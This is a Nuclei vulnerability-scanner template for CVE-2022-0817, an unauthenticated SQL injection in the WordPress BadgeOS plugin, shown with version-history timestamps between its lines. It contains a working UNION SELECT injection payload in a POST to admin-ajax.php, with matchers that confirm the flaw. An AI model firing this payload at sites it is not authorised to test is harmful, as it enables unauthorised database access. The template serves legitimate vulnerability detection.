2022-10-27 07:06:09 +00:00
id : CVE-2022-0817
info :
2022-12-09 21:40:18 +00:00
name : WordPress BadgeOS <=3.7.0 - SQL Injection
2022-10-27 07:06:09 +00:00
author : theamanrawat
severity : critical
description : |
2022-12-09 21:40:18 +00:00
WordPress BadgeOS plugin through 3.7.0 contains a SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2022-10-27 07:06:09 +00:00
reference :
- https://wpscan.com/vulnerability/69263610-f454-4f27-80af-be523d25659e
- https://wordpress.org/plugins/badgeos/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0817
classification :
2022-11-04 13:41:59 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-10-27 07:06:09 +00:00
cve-id : CVE-2022-0817
2022-11-04 13:41:59 +00:00
cwe-id : CWE-89
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:badgeos:badgeos:*:*:*:*:*:*:*:*
epss-score : 0.01364
2022-10-27 07:06:09 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-06-04 08:13:42 +00:00
verified : true
2022-11-04 13:41:59 +00:00
tags : cve2022,wp,unauth,sqli,cve,wp-plugin,badgeos,wpscan,wordpress
2022-10-27 07:06:09 +00:00
2022-10-27 14:47:08 +00:00
variables :
num : "999999999"
2023-04-27 04:28:59 +00:00
http :
2022-10-27 07:06:09 +00:00
- raw :
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-10-27 14:47:08 +00:00
action=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5({{num}}),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
2022-10-27 07:06:09 +00:00
matchers :
- type : dsl
dsl :
- 'status_code == 200'
2022-10-27 14:47:08 +00:00
- "contains(body, md5(num))"
2022-10-27 07:06:09 +00:00
- 'contains(content_type, "application/json")'
2022-10-27 14:35:16 +00:00
- 'contains(body, "badgeos-arrange-buttons")'
condition : and